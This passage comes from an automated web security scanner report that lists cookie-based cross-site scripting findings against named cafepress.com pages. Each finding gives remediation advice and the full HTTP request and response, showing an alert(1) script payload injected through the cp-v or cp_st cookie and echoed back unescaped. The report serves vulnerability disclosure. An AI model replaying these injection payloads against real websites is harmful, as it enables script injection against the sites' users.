s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59529 Date: Sun, 26 Dec 2010 13:49:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59529 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4f3e8</script><script>alert(1)</script>edf8d16990b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6e0c4f15927 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 49072 Date: Sun, 26 Dec 2010 13:49:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49072 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c582f</script><script>alert(1)</script>2b819df52d1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c582f</script><script>alert(1)</script>2b819df52d1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 49112 Date: Sun, 26 Dec 2010 13:49:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49112 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]... s = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'PremiumShop' window.cafepress.tealeaf.searchTerm = 'c582f</script><script>alert(1)</script>2b819df52d1 ' window.cafepress.tealeaf.salesChannel = 'Shop' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10557"-alert(1)-"7c7111c0034 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 75201 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a3f</script><script>alert(1)</script>4b81aaff511 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=97a3f</script><script>alert(1)</script>4b81aaff511 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 75223 Date: Sun, 26 Dec 2010 13:46:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75223 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = '97a3f</script><script>alert(1)</script>4b81aaff511 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/catalogExp/addtocarthelper.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 758b2"-alert(1)-"7bb18591cca was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 ntCoent-Length: 41323 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41323 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/catalogExp/addtocarthelper.aspx
Issue detail
